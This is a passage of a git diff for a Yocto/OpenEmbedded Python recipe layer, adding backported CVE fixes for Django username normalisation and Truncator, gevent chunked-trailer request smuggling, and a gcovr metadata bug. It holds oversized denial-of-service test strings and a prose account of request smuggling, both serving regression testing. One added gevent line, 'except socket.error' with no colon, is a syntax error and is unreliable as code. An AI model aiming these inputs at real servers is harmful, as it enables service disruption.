'\t' * 50000) + '//>', None), +- ('&' * 50000, '&' * 9 + '…'), +- ('_X<<<<<<<<<<<>', None), ++ ("</a" + "\t" * (max_len - 6) + "//>", None), ++ ("</p" + "\t" * bigger_len + "//>", "</p" + "\t" * 6 + "…"), ++ ("&" * bigger_len, "&" * 9 + "…"), ++ ("_X<<<<<<<<<<<>", None), ++ (valid_html * bigger_len, "<p>Joel is a…</p>"), # 10 chars + ] + for value, expected in perf_test_values: + with self.subTest(value=value): +@@ -149,15 +156,25 @@ class TestUtilsText(SimpleTestCase): + truncator = text.Truncator('<p>I <3 python, what about you?</p>') + self.assertEqual('<p>I <3 python,…</p>', truncator.words(3, html=True)) + ++ @patch("django.utils.text.Truncator.MAX_LENGTH_HTML", 10_000) ++ def test_truncate_words_html_size_limit(self): ++ max_len = text.Truncator.MAX_LENGTH_HTML ++ bigger_len = text.Truncator.MAX_LENGTH_HTML + 1 ++ valid_html = "<p>Joel is a slug</p>" # 4 words + perf_test_values = [ +- ('</a' + '\t' * 50000) + '//>', +- '&' * 50000, +- '_X<<<<<<<<<<<>', ++ ("</a" + "\t" * (max_len - 6) + "//>", None), ++ ("</p" + "\t" * bigger_len + "//>", "</p" + "\t" * (max_len - 3) + "…"), ++ ("&" * max_len, None), # no change ++ ("&" * bigger_len, "&" * max_len + "…"), ++ ("_X<<<<<<<<<<<>", None), ++ (valid_html * bigger_len, valid_html * 12 + "<p>Joel is…</p>"), # 50 words + ] +- for value in perf_test_values: ++ for value, expected in perf_test_values: + with self.subTest(value=value): + truncator = text.Truncator(value) +- self.assertEqual(value, truncator.words(50, html=True)) ++ self.assertEqual( ++ expected if expected else value, truncator.words(50, html=True) ++ ) + + def test_wrap(self): + digits = '1234 67 9' +-- +2.40.0 diff --git a/meta-python/recipes-devtools/python/python3-django/CVE-2023-46695.patch b/meta-python/recipes-devtools/python/python3-django/CVE-2023-46695.patch new file mode 100644 index 0000000000..b7dda41f8f --- /dev/null +++ b/meta-python/recipes-devtools/python/python3-django/CVE-2023-46695.patch @@ -0,0 +1,90 @@ +From 32bc7fa517be1d50239827520cc13f3112d3d748 Mon Sep 17 00:00:00 2001 +From: Mariusz Felisiak <felisiak.mariusz@gmail.com> +Date: Wed, 29 Nov 2023 12:49:41 +0000 +Subject: [PATCH 2/2] Fixed CVE-2023-46695 -- Fixed potential DoS in + UsernameField on Windows. + +Thanks MProgrammer (https://hackerone.com/mprogrammer) for the report. + +CVE: CVE-2023-46695 + +Upstream-Status: Backport [https://github.com/django/django/commit/f9a7fb8466a7ba4857eaf930099b5258f3eafb2b] + +Signed-off-by: Narpat Mali <narpat.mali@windriver.com> +--- + django/contrib/auth/forms.py | 10 +++++++++- + docs/releases/2.2.28.txt | 14 ++++++++++++++ + tests/auth_tests/test_forms.py | 8 +++++++- + 3 files changed, 30 insertions(+), 2 deletions(-) + +diff --git a/django/contrib/auth/forms.py b/django/contrib/auth/forms.py +index e6f73fe..26d3ca7 100644 +--- a/django/contrib/auth/forms.py ++++ b/django/contrib/auth/forms.py +@@ -68,7 +68,15 @@ class ReadOnlyPasswordHashField(forms.Field): + + class UsernameField(forms.CharField): + def to_python(self, value): +- return unicodedata.normalize('NFKC', super().to_python(value)) ++ value = super().to_python(value) ++ if self.max_length is not None and len(value) > self.max_length: ++ # Normalization can increase the string length (e.g. ++ # "ff" -> "ff", "½" -> "1⁄2") but cannot reduce it, so there is no ++ # point in normalizing invalid data. Moreover, Unicode ++ # normalization is very slow on Windows and can be a DoS attack ++ # vector. ++ return value ++ return unicodedata.normalize("NFKC", value) + + + class UserCreationForm(forms.ModelForm): +diff --git a/docs/releases/2.2.28.txt b/docs/releases/2.2.28.txt +index 6a38e9c..c653cb6 100644 +--- a/docs/releases/2.2.28.txt ++++ b/docs/releases/2.2.28.txt +@@ -76,3 +76,17 @@ filters, which were thus also vulnerable. + The input processed by ``Truncator``, when operating in HTML mode, has been + limited to the first five million characters in order to avoid potential + performance and memory issues. ++ ++Backporting the CVE-2023-46695 fix on Django 2.2.28. ++ ++CVE-2023-46695: Potential denial of service vulnerability in ``UsernameField`` on Windows ++========================================================================================= ++ ++The :func:`NFKC normalization <python:unicodedata.normalize>` is slow on ++Windows. As a consequence, ``django.contrib.auth.forms.UsernameField`` was ++subject to a potential denial of service attack via certain inputs with a very ++large number of Unicode characters. ++ ++In order to avoid the vulnerability, invalid values longer than ++``UsernameField.max_length`` are no longer normalized, since they cannot pass ++validation anyway. +diff --git a/tests/auth_tests/test_forms.py b/tests/auth_tests/test_forms.py +index bed23af..e73d4b8 100644 +--- a/tests/auth_tests/test_forms.py ++++ b/tests/auth_tests/test_forms.py +@@ -6,7 +6,7 @@ from django import forms + from django.contrib.auth.forms import ( + AdminPasswordChangeForm, AuthenticationForm, PasswordChangeForm, + PasswordResetForm, ReadOnlyPasswordHashField, ReadOnlyPasswordHashWidget, +- SetPasswordForm, UserChangeForm, UserCreationForm, ++ SetPasswordForm, UserChangeForm, UserCreationForm, UsernameField, + ) + from django.contrib.auth.models import User + from django.contrib.auth.signals import user_login_failed +@@ -132,6 +132,12 @@ class UserCreationFormTest(TestDataMixin, TestCase): + self.assertNotEqual(user.username, ohm_username) + self.assertEqual(user.username, 'testΩ') # U+03A9 GREEK CAPITAL LETTER OMEGA + ++ def test_invalid_username_no_normalize(self): ++ field = UsernameField(max_length=254) ++ # Usernames are not normalized if they are too long. ++ self.assertEqual(field.to_python("½" * 255), "½" * 255) ++ self.assertEqual(field.to_python("ff" * 254), "ff" * 254) ++ + def test_duplicate_normalized_unicode(self): + """ + To prevent almost identical usernames, visually identical but differing +-- +2.40.0 diff --git a/meta-python/recipes-devtools/python/python3-django_2.2.28.bb b/meta-python/recipes-devtools/python/python3-django_2.2.28.bb index 9ef988176e..8c955e6bd8 100644 --- a/meta-python/recipes-devtools/python/python3-django_2.2.28.bb +++ b/meta-python/recipes-devtools/python/python3-django_2.2.28.bb @@ -5,6 +5,13 @@ UPSTREAM_CHECK_REGEX = "/${PYPI_PACKAGE}/(?P<pver>(2\.2\.\d*)+)/" inherit setuptools3 +SRC_URI += "file://CVE-2023-31047.patch \ + file://CVE-2023-36053.patch \ + file://CVE-2023-41164.patch \ + file://CVE-2023-43665.patch \ + file://CVE-2023-46695.patch \ + " + SRC_URI[sha256sum] = "0200b657afbf1bc08003845ddda053c7641b9b24951e52acd51f6abda33a7413" RDEPENDS:${PN} += "\ diff --git a/meta-python/recipes-devtools/python/python3-django_3.2.12.bb b/meta-python/recipes-devtools/python/python3-django_3.2.23.bb index adbc498bdf..beecaa607c 100644 --- a/meta-python/recipes-devtools/python/python3-django_3.2.12.bb +++ b/meta-python/recipes-devtools/python/python3-django_3.2.23.bb @@ -1,7 +1,7 @@ require python-django.inc inherit setuptools3 -SRC_URI[sha256sum] = "9772e6935703e59e993960832d66a614cf0233a1c5123bc6224ecc6ad69e41e2" +SRC_URI[sha256sum] = "82968f3640e29ef4a773af2c28448f5f7a08d001c6ac05b32d02aeee6509508b" RDEPENDS:${PN} += "\ ${PYTHON_PN}-sqlparse \ @@ -9,5 +9,5 @@ RDEPENDS:${PN} += "\ # Set DEFAULT_PREFERENCE so that the LTS version of django is built by # default. To build the 3.x branch, -# PREFERRED_VERSION_python3-django = "3.2.2" can be added to local.conf +# PREFERRED_VERSION_python3-django = "3.2.23" can be added to local.conf DEFAULT_PREFERENCE = "-1" diff --git a/meta-python/recipes-devtools/python/python3-django_4.0.2.bb b/meta-python/recipes-devtools/python/python3-django_4.2.10.bb index 690b9809dc..a9f25ac2b3 100644 --- a/meta-python/recipes-devtools/python/python3-django_4.0.2.bb +++ b/meta-python/recipes-devtools/python/python3-django_4.2.10.bb @@ -1,7 +1,7 @@ require python-django.inc inherit setuptools3 -SRC_URI[sha256sum] = "110fb58fb12eca59e072ad59fc42d771cd642dd7a2f2416582aa9da7a8ef954a" +SRC_URI[sha256sum] = "b1260ed381b10a11753c73444408e19869f3241fc45c985cd55a30177c789d13" RDEPENDS:${PN} += "\ ${PYTHON_PN}-sqlparse \ @@ -9,5 +9,5 @@ RDEPENDS:${PN} += "\ # Set DEFAULT_PREFERENCE so that the LTS version of django is built by # default. To build the 4.x branch, -# PREFERRED_VERSION_python3-django = "4.0.2" can be added to local.conf +# PREFERRED_VERSION_python3-django = "4.2.7" can be added to local.conf DEFAULT_PREFERENCE = "-1" diff --git a/meta-python/recipes-devtools/python/python3-gcovr/0001-Fix-parsing-of-gcov-metadata-601.patch b/meta-python/recipes-devtools/python/python3-gcovr/0001-Fix-parsing-of-gcov-metadata-601.patch new file mode 100644 index 0000000000..5530a39857 --- /dev/null +++ b/meta-python/recipes-devtools/python/python3-gcovr/0001-Fix-parsing-of-gcov-metadata-601.patch @@ -0,0 +1,84 @@ +From c4f53f28c4c537b75b5912a44083c41262807504 Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?Michael=20F=C3=B6rderer?= <michael.foerderer@gmx.de> +Date: Sun, 3 Apr 2022 22:58:33 +0200 +Subject: [PATCH] Fix parsing of gcov metadata (#601) + +gcc-11 has metadata line "-: 0:Source is newer than graph" which throws an error. + +Upstream-Status: Backport [https://github.com/gcovr/gcovr/commit/7b6947bd4b6fd28a477606313fff3c13fcea8d3d] + +Signed-off-by: Jasper Orschulko <jasper@fancydomain.eu> +--- + gcovr/gcov.py | 5 ++++- + gcovr/gcov_parser.py | 24 ++++++++++++++++++++---- + 2 files changed, 24 insertions(+), 5 deletions(-) + +diff --git a/gcovr/gcov.py b/gcovr/gcov.py +index cc7a9af4..ff4cdb0b 100644 +--- a/gcovr/gcov.py ++++ b/gcovr/gcov.py +@@ -98,8 +98,11 @@ def process_gcov_data(data_fname, covdata, source_fname, options, currdir=None): + # Find the source file + # TODO: instead of heuristics, use "working directory" if available + metadata = parse_metadata(lines) ++ source = metadata.get("Source") ++ if source is None: ++ raise RuntimeError("Unexpected value 'None' for metadata 'Source'.") + fname = guess_source_file_name( +- metadata["Source"].strip(), ++ source, + data_fname, + source_fname, + root_dir=options.root_dir, +diff --git a/gcovr/gcov_parser.py b/gcovr/gcov_parser.py +index 391ecd78..523ea406 100644 +--- a/gcovr/gcov_parser.py ++++ b/gcovr/gcov_parser.py +@@ -121,7 +121,7 @@ class _MetadataLine(NamedTuple): + """A gcov line with metadata: ``-: 0:KEY:VALUE``""" + + key: str +- value: str ++ value: Optional[str] + + + class _BlockLine(NamedTuple): +@@ -214,7 +214,19 @@ def parse_metadata(lines: List[str]) -> Dict[str, str]: + ... -: 0:Foo:bar + ... -: 0:Key:123 + ... '''.splitlines()) +- {'Foo': 'bar', 'Key': '123'} ++ Traceback (most recent call last): ++ ... ++ RuntimeError: Missing key 'Source' in metadata. GCOV data was >> ++ -: 0:Foo:bar ++ -: 0:Key:123<< End of GCOV data ++ >>> parse_metadata('-: 0:Source: file \n -: 0:Foo: bar \n -: 0:Key: 123 '.splitlines()) ++ {'Source': 'file', 'Foo': 'bar', 'Key': '123'} ++ >>> parse_metadata(''' ++ ... -: 0:Source:file ++ ... -: 0:Foo:bar ++ ... -: 0:Key ++ ... '''.splitlines()) ++ {'Source': 'file', 'Foo': 'bar', 'Key': None} + """ + collected = {} + for line in lines: +@@ -721,8 +733,12 @@ def _parse_line(line: str) -> _Line: + + # METADATA (key, value) + if count_str == "-" and lineno == "0": +- key, value = source_code.split(":", 1) +- return _MetadataLine(key, value) ++ if ":" in source_code: ++ key, value = source_code.split(":", 1) ++ return _MetadataLine(key, value.strip()) ++ else: ++ # Add a syntethic metadata with no value ++ return _MetadataLine(source_code, None) + + if count_str == "-": + count = 0 +-- +2.41.0 + diff --git a/meta-python/recipes-devtools/python/python3-gcovr_5.1.bb b/meta-python/recipes-devtools/python/python3-gcovr_5.1.bb index 995f3b779b..5dcd9496c5 100644 --- a/meta-python/recipes-devtools/python/python3-gcovr_5.1.bb +++ b/meta-python/recipes-devtools/python/python3-gcovr_5.1.bb @@ -4,7 +4,8 @@ SECTION = "devel/python" LICENSE = "BSD-3-Clause" LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=08208c66520e8d69d5367483186d94ed" -SRC_URI = "git://github.com/gcovr/gcovr.git;branch=master;protocol=https" +SRC_URI = "git://github.com/gcovr/gcovr.git;branch=main;protocol=https" +SRC_URI += "file://0001-Fix-parsing-of-gcov-metadata-601.patch" SRCREV = "e71e883521b78122c49016eb4e510e6da06c6916" S = "${WORKDIR}/git" @@ -12,6 +13,6 @@ S = "${WORKDIR}/git" inherit setuptools3 PIP_INSTALL_PACKAGE = "gcovr" -RDEPENDS:${PN} += "${PYTHON_PN}-jinja2 ${PYTHON_PN}-lxml ${PYTHON_PN}-setuptools ${PYTHON_PN}-pygments" +RDEPENDS:${PN} += "${PYTHON_PN}-jinja2 ${PYTHON_PN}-lxml ${PYTHON_PN}-setuptools ${PYTHON_PN}-pygments ${PYTHON_PN}-multiprocessing" BBCLASSEXTEND = "native nativesdk" diff --git a/meta-python/recipes-devtools/python/python3-gevent/CVE-2023-41419.patch b/meta-python/recipes-devtools/python/python3-gevent/CVE-2023-41419.patch new file mode 100644 index 0000000000..c92ba876a8 --- /dev/null +++ b/meta-python/recipes-devtools/python/python3-gevent/CVE-2023-41419.patch @@ -0,0 +1,673 @@ +From f80ee15e27b67b6fdd101d5f91cf584d19b2b26e Mon Sep 17 00:00:00 2001 +From: Jason Madden <jamadden@gmail.com> +Date: Fri, 6 Oct 2023 12:41:59 +0000 +Subject: [PATCH] gevent.pywsgi: Much improved handling of chunk trailers. + Validation is much stricter to the specification. + +Fixes #1989 + +CVE: CVE-2023-41419 + +Upstream-Status: Backport [https://github.com/gevent/gevent/commit/2f53c851eaf926767fbac62385615efd4886221c] + +Signed-off-by: Narpat Mali <narpat.mali@windriver.com> +--- + docs/changes/1989.bugfix | 26 ++++ + src/gevent/pywsgi.py | 229 ++++++++++++++++++++++++------- + src/gevent/subprocess.py | 7 +- + src/gevent/testing/testcase.py | 2 +- + src/gevent/tests/test__pywsgi.py | 193 ++++++++++++++++++++++++-- + 5 files changed, 390 insertions(+), 67 deletions(-) + create mode 100644 docs/changes/1989.bugfix + +diff --git a/docs/changes/1989.bugfix b/docs/changes/1989.bugfix +new file mode 100644 +index 0000000..7ce4a93 +--- /dev/null ++++ b/docs/changes/1989.bugfix +@@ -0,0 +1,26 @@ ++Make ``gevent.pywsgi`` comply more closely with the HTTP specification ++for chunked transfer encoding. In particular, we are much stricter ++about trailers, and trailers that are invalid (too long or featuring ++disallowed characters) forcibly close the connection to the client ++*after* the results have been sent. ++ ++Trailers otherwise continue to be ignored and are not available to the ++WSGI application. ++ ++Previously, carefully crafted invalid trailers in chunked requests on ++keep-alive connections might appear as two requests to ++``gevent.pywsgi``. Because this was handled exactly as a normal ++keep-alive connection with two requests, the WSGI application should ++handle it normally. However, if you were counting on some upstream ++server to filter incoming requests based on paths or header fields, ++and the upstream server simply passed trailers through without ++validating them, then this embedded second request would bypass those ++checks. (If the upstream server validated that the trailers meet the ++HTTP specification, this could not occur, because characters that are ++required in an HTTP request, like a space, are not allowed in ++trailers.) CVE-2023-41419 was reserved for this. ++ ++Our thanks to the original reporters, Keran Mu ++(mkr22@mails.tsinghua.edu.cn) and Jianjun Chen ++(jianjun@tsinghua.edu.cn), from Tsinghua University and Zhongguancun ++Laboratory. +diff --git a/src/gevent/pywsgi.py b/src/gevent/pywsgi.py +index 0ebe095..078398a 100644 +--- a/src/gevent/pywsgi.py ++++ b/src/gevent/pywsgi.py +@@ -1,13 +1,28 @@ + # Copyright (c) 2005-2009, eventlet contributors + # Copyright (c) 2009-2018, gevent contributors + """ +-A pure-Python, gevent-friendly WSGI server. ++A pure-Python, gevent-friendly WSGI server implementing HTTP/1.1. + + The server is provided in :class:`WSGIServer`, but most of the actual + WSGI work is handled by :class:`WSGIHandler` --- a new instance is + created for each request. The server can be customized to use + different subclasses of :class:`WSGIHandler`. + ++.. important:: ++ This server is intended primarily for development and testing, and ++ secondarily for other "safe" scenarios where it will not be exposed to ++ potentially malicious input. The code has not been security audited, ++ and is not intended for direct exposure to the public Internet. For production ++ usage on the Internet, either choose a production-strength server such as ++ gunicorn, or put a reverse proxy between gevent and the Internet. ++.. versionchanged:: NEXT ++ Complies more closely with the HTTP specification for chunked transfer encoding. ++ In particular, we are much stricter about trailers, and trailers that ++ are invalid (too long or featuring disallowed characters) forcibly close ++ the connection to the client *after* the results have been sent. ++ Trailers otherwise continue to be ignored and are not available to the ++ WSGI application. ++ + """ + from __future__ import absolute_import + +@@ -22,10 +37,7 @@ import time + import traceback + from datetime import datetime + +-try: +- from urllib import unquote +-except ImportError: +- from urllib.parse import unquote # python 2 pylint:disable=import-error,no-name-in-module ++from urllib.parse import unquote + + from gevent import socket + import gevent +@@ -53,29 +65,52 @@ __all__ = [ + + MAX_REQUEST_LINE = 8192 + # Weekday and month names for HTTP date/time formatting; always English! +-_WEEKDAYNAME = ["Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun"] +-_MONTHNAME = [None, # Dummy so we can use 1-based month numbers ++_WEEKDAYNAME = ("Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun") ++_MONTHNAME = (None, # Dummy so we can use 1-based month numbers + "Jan", "Feb", "Mar", "Apr", "May", "Jun", +- "Jul", "Aug", "Sep", "Oct", "Nov", "Dec"] ++ "Jul", "Aug", "Sep", "Oct", "Nov", "Dec") + + # The contents of the "HEX" grammar rule for HTTP, upper and lowercase A-F plus digits, + # in byte form for comparing to the network. + _HEX = string.hexdigits.encode('ascii') + ++# The characters allowed in "token" rules. ++ ++# token = 1*tchar ++# tchar = "!" / "#" / "$" / "%" / "&" / "'" / "*" ++# / "+" / "-" / "." / "^" / "_" / "`" / "|" / "~" ++# / DIGIT / ALPHA ++# ; any VCHAR, except delimiters ++# ALPHA = %x41-5A / %x61-7A ; A-Z / a-z ++_ALLOWED_TOKEN_CHARS = frozenset( ++ # Remember we have to be careful because bytestrings ++ # inexplicably iterate as integers, which are not equal to bytes. ++ ++ # explicit chars then DIGIT ++ (c.encode('ascii') for c in "!#$%&'*+-.^_`|~0123456789") ++ # Then we add ALPHA ++) | {c.encode('ascii') for c in string.ascii_letters} ++assert b'A' in _ALLOWED_TOKEN_CHARS ++ ++ + # Errors + _ERRORS = {} + _INTERNAL_ERROR_STATUS = '500 Internal Server Error' + _INTERNAL_ERROR_BODY = b'Internal Server Error' +-_INTERNAL_ERROR_HEADERS = [('Content-Type', 'text/plain'), +- ('Connection', 'close'), +- ('Content-Length', str(len(_INTERNAL_ERROR_BODY)))] ++_INTERNAL_ERROR_HEADERS = ( ++ ('Content-Type', 'text/plain'), ++ ('Connection', 'close'), ++ ('Content-Length', str(len(_INTERNAL_ERROR_BODY))) ++) + _ERRORS[500] = (_INTERNAL_ERROR_STATUS, _INTERNAL_ERROR_HEADERS, _INTERNAL_ERROR_BODY) + + _BAD_REQUEST_STATUS = '400 Bad Request' + _BAD_REQUEST_BODY = '' +-_BAD_REQUEST_HEADERS = [('Content-Type', 'text/plain'), +- ('Connection', 'close'), +- ('Content-Length', str(len(_BAD_REQUEST_BODY)))] ++_BAD_REQUEST_HEADERS = ( ++ ('Content-Type', 'text/plain'), ++ ('Connection', 'close'), ++ ('Content-Length', str(len(_BAD_REQUEST_BODY))) ++) + _ERRORS[400] = (_BAD_REQUEST_STATUS, _BAD_REQUEST_HEADERS, _BAD_REQUEST_BODY) + + _REQUEST_TOO_LONG_RESPONSE = b"HTTP/1.1 414 Request URI Too Long\r\nConnection: close\r\nContent-length: 0\r\n\r\n" +@@ -204,23 +239,32 @@ class Input(object): + # Read and return the next integer chunk length. If no + # chunk length can be read, raises _InvalidClientInput. + +- # Here's the production for a chunk: +- # (http://www.w3.org/Protocols/rfc2616/rfc2616-sec3.html) +- # chunk = chunk-size [ chunk-extension ] CRLF +- # chunk-data CRLF +- # chunk-size = 1*HEX +- # chunk-extension= *( ";" chunk-ext-name [ "=" chunk-ext-val ] ) +- # chunk-ext-name = token +- # chunk-ext-val = token | quoted-string +- +- # To cope with malicious or broken clients that fail to send valid +- # chunk lines, the strategy is to read character by character until we either reach +- # a ; or newline. If at any time we read a non-HEX digit, we bail. If we hit a +- # ;, indicating an chunk-extension, we'll read up to the next +- # MAX_REQUEST_LINE characters +- # looking for the CRLF, and if we don't find it, we bail. If we read more than 16 hex characters, +- # (the number needed to represent a 64-bit chunk size), we bail (this protects us from +- # a client that sends an infinite stream of `F`, for example). ++ # Here's the production for a chunk (actually the whole body): ++ # (https://www.rfc-editor.org/rfc/rfc7230#section-4.1) ++ ++ # chunked-body = *chunk ++ # last-chunk ++ # trailer-part ++ # CRLF ++ # ++ # chunk = chunk-size [ chunk-ext ] CRLF ++ # chunk-data CRLF ++ # chunk-size = 1*HEXDIG ++ # last-chunk = 1*("0") [ chunk-ext ] CRLF ++ # trailer-part = *( header-field CRLF ) ++ # chunk-data = 1*OCTET ; a sequence of chunk-size octets ++ ++ # To cope with malicious or broken clients that fail to send ++ # valid chunk lines, the strategy is to read character by ++ # character until we either reach a ; or newline. If at any ++ # time we read a non-HEX digit, we bail. If we hit a ;, ++ # indicating an chunk-extension, we'll read up to the next ++ # MAX_REQUEST_LINE characters ("A server ought to limit the ++ # total length of chunk extensions received") looking for the ++ # CRLF, and if we don't find it, we bail. If we read more than ++ # 16 hex characters, (the number needed to represent a 64-bit ++ # chunk size), we bail (this protects us from a client that ++ # sends an infinite stream of `F`, for example). + + buf = BytesIO() + while 1: +@@ -228,16 +272,20 @@ class Input(object): + if not char: + self._chunked_input_error = True + raise _InvalidClientInput("EOF before chunk end reached") +- if char == b'\r': +- break +- if char == b';': ++ ++ if char in ( ++ b'\r', # Beginning EOL ++ b';', # Beginning extension ++ ): + break + +- if char not in _HEX: ++ if char not in _HEX: # Invalid data. + self._chunked_input_error = True + raise _InvalidClientInput("Non-hex data", char) ++ + buf.write(char) +- if buf.tell() > 16: ++ ++ if buf.tell() > 16: # Too many hex bytes + self._chunked_input_error = True + raise _InvalidClientInput("Chunk-size too large.") + +@@ -257,11 +305,72 @@ class Input(object): + if char == b'\r': + # We either got here from the main loop or from the + # end of an extension ++ self.__read_chunk_size_crlf(rfile, newline_only=True) ++ result = int(buf.getvalue(), 16) ++ if result == 0: ++ # The only time a chunk size of zero is allowed is the final ++ # chunk. It is either followed by another \r\n, or some trailers ++ # which are then followed by \r\n. ++ while self.__read_chunk_trailer(rfile): ++ pass ++ return result ++ ++ # Trailers have the following production (they are a header-field followed by CRLF) ++ # See above for the definition of "token". ++ # ++ # header-field = field-name ":" OWS field-value OWS ++ # field-name = token ++ # field-value = *( field-content / obs-fold ) ++ # field-content = field-vchar [ 1*( SP / HTAB ) field-vchar ] ++ # field-vchar = VCHAR / obs-text ++ # obs-fold = CRLF 1*( SP / HTAB ) ++ # ; obsolete line folding ++ # ; see Section 3.2.4 ++ ++ ++ def __read_chunk_trailer(self, rfile, ): ++ # With rfile positioned just after a \r\n, read a trailer line. ++ # Return a true value if a non-empty trailer was read, and ++ # return false if an empty trailer was read (meaning the trailers are ++ # done). ++ # If a single line exceeds the MAX_REQUEST_LINE, raise an exception. ++ # If the field-name portion contains invalid characters, raise an exception. ++ ++ i = 0 ++ empty = True ++ seen_field_name = False ++ while i < MAX_REQUEST_LINE: ++ char = rfile.read(1) ++ if char == b'\r': ++ # Either read the next \n or raise an error. ++ self.__read_chunk_size_crlf(rfile, newline_only=True) ++ break ++ # Not a \r, so we are NOT an empty chunk. ++ empty = False ++ if char == b':' and i > 0: ++ # We're ending the field-name part; stop validating characters. ++ # Unless : was the first character... ++ seen_field_name = True ++ if not seen_field_name and char not in _ALLOWED_TOKEN_CHARS: ++ raise _InvalidClientInput('Invalid token character: %r' % (char,)) ++ i += 1 ++ else: ++ # We read too much ++ self._chunked_input_error = True ++ raise _InvalidClientInput("Too large chunk trailer") ++ return not empty ++ ++ def __read_chunk_size_crlf(self, rfile, newline_only=False): ++ # Also for safety, correctly verify that we get \r\n when expected. ++ if not newline_only: + char = rfile.read(1) +- if char != b'\n': ++ if char != b'\r': + self._chunked_input_error = True +- raise _InvalidClientInput("Line didn't end in CRLF") +- return int(buf.getvalue(), 16) ++ raise _InvalidClientInput("Line didn't end in CRLF: %r" % (char,)) ++ char = rfile.read(1) ++ if char != b'\n': ++ self._chunked_input_error = True ++ raise _InvalidClientInput("Line didn't end in LF: %r" % (char,)) + + def _chunked_read(self, length=None, use_readline=False): + # pylint:disable=too-many-branches +@@ -294,7 +403,7 @@ class Input(object): + + self.position += datalen + if self.chunk_length == self.position: +- rfile.readline() ++ self.__read_chunk_size_crlf(rfile) + + if length is not None: + length -= datalen +@@ -307,9 +416,9 @@ class Input(object): + # determine the next size to read + self.chunk_length = self.__read_chunk_length(rfile) + self.position = 0 +- if self.chunk_length == 0: +- # Last chunk. Terminates with a CRLF. +- rfile.readline() ++ # If chunk_length was 0, we already read any trailers and ++ # validated that we have ended with \r\n\r\n. ++ + return b''.join(response) + + def read(self, length=None): +@@ -532,7 +641,8 @@ class WSGIHandler(object): + elif len(words) == 2: + self.command, self.path = words + if self.command != "GET": +- raise _InvalidClientRequest('Expected GET method: %r' % (raw_requestline,)) ++ raise _InvalidClientRequest('Expected GET method; Got command=%r; path=%r; raw=%r' % ( ++ self.command, self.path, raw_requestline,)) + self.request_version = "HTTP/0.9" + # QQQ I'm pretty sure we can drop support for HTTP/0.9 + else: +@@ -1000,14 +1110,28 @@ class WSGIHandler(object): + finally: + try: + self.wsgi_input._discard() +- except (socket.error, IOError): +- # Don't let exceptions during discarding ++ except _InvalidClientInput: ++ # This one is deliberately raised to the outer ++ # scope, because, with the incoming stream in some bad state, ++ # we can't be sure we can synchronize and properly parse the next ++ # request. ++ raise ++ except socket.error ++ # Don't let socket exceptions during discarding + # input override any exception that may have been + # raised by the application, such as our own _InvalidClientInput. + # In the general case, these aren't even worth logging (see the comment + # just below) + pass +- except _InvalidClientInput: ++ except _InvalidClientInput as ex: ++ # DO log this one because: ++ # - Some of the data may have been read and acted on by the ++ # application; ++ # - The response may or may not have been sent; ++ # - It's likely that the client is bad, or malicious, and ++ # users might wish to take steps to block the client. ++ self._handle_client_error(ex) ++ self.close_connection = True + self._send_error_response_if_possible(400) + except socket.error as ex: + if ex.args[0] in self.ignored_socket_errors: +@@ -1054,17 +1178,22 @@ class WSGIHandler(object): + def _handle_client_error(self, ex): + # Called for invalid client input + # Returns the appropriate error response. +- if not isinstance(ex, ValueError): ++ if not isinstance(ex, (ValueError, _InvalidClientInput)): + # XXX: Why not self._log_error to send it through the loop's + # handle_error method? ++ # _InvalidClientRequest is a ValueError; _InvalidClientInput is an IOError. + traceback.print_exc() + if isinstance(ex, _InvalidClientRequest): + # No formatting needed, that's already been handled. In fact, because the + # formatted message contains user input, it might have a % in it, and attempting + # to format that with no arguments would be an error. +- self.log_error(ex.formatted_message) ++ # However, the error messages do not include the requesting IP ++ # necessarily, so we do add that. ++ self.log_error('(from %s) %s', self.client_address, ex.formatted_message) + else: +- self.log_error('Invalid request: %s', str(ex) or ex.__class__.__name__) ++ self.log_error('Invalid request (from %s): %s', ++ self.client_address, ++ str(ex) or ex.__class__.__name__) + return ('400', _BAD_REQUEST_RESPONSE) + + def _headers(self): +diff --git a/src/gevent/subprocess.py b/src/gevent/subprocess.py +index 38c9bd3..8a8ccad 100644 +--- a/src/gevent/subprocess.py ++++ b/src/gevent/subprocess.py +@@ -352,10 +352,11 @@ def check_output(*popenargs, **kwargs): + + To capture standard error in the result, use ``stderr=STDOUT``:: + +- >>> print(check_output(["/bin/sh", "-c", ++ >>> output = check_output(["/bin/sh", "-c", + ... "ls -l non_existent_file ; exit 0"], +- ... stderr=STDOUT).decode('ascii').strip()) +- ls: non_existent_file: No such file or directory ++ ... stderr=STDOUT).decode('ascii').strip() ++ >>> print(output.rsplit(':', 1)[1].strip()) ++ No such file or directory + + There is an additional optional argument, "input", allowing you to + pass a string to the subprocess's stdin. If you use this argument +diff --git a/src/gevent/testing/testcase.py b/src/gevent/testing/testcase.py +index cd5db80..aa86dcf 100644 +--- a/src/gevent/testing/testcase.py ++++ b/src/gevent/testing/testcase.py +@@ -225,7 +225,7 @@ class TestCaseMetaClass(type): + classDict.pop(key) + # XXX: When did we stop doing this? + #value = wrap_switch_count_check(value) +- value = _wrap_timeout(timeout, value) ++ #value = _wrap_timeout(timeout, value) + error_fatal = getattr(value, 'error_fatal', error_fatal) + if error_fatal: + value = errorhandler.wrap_error_fatal(value) +diff --git a/src/gevent/tests/test__pywsgi.py b/src/gevent/tests/test__pywsgi.py +index d2125a8..d46030b 100644 +--- a/src/gevent/tests/test__pywsgi.py ++++ b/src/gevent/tests/test__pywsgi.py +@@ -25,21 +25,11 @@ from gevent import monkey + monkey.patch_all() + + from contextlib import contextmanager +-try: +- from urllib.parse import parse_qs +-except ImportError: +- # Python 2 +- from urlparse import parse_qs ++from urllib.parse import parse_qs + import os + import sys +-try: +- # On Python 2, we want the C-optimized version if +- # available; it has different corner-case behaviour than +- # the Python implementation, and it used by socket.makefile +- # by default. +- from cStringIO import StringIO +-except ImportError: +- from io import BytesIO as StringIO ++from io import BytesIO as StringIO ++ + import weakref + import unittest + from wsgiref.validate import validator +@@ -156,6 +146,10 @@ class Response(object): + @classmethod + def read(cls, fd, code=200, reason='default', version='1.1', + body=None, chunks=None, content_length=None): ++ """ ++ Read an HTTP response, optionally perform assertions, ++ and return the Response object. ++ """ + # pylint:disable=too-many-branches + _status_line, headers = read_headers(fd) + self = cls(_status_line, headers) +@@ -716,7 +710,14 @@ class TestNegativeReadline(TestCase): + + class TestChunkedPost(TestCase): + ++ calls = 0 ++ ++ def setUp(self): ++ super().setUp() ++ self.calls = 0 ++ + 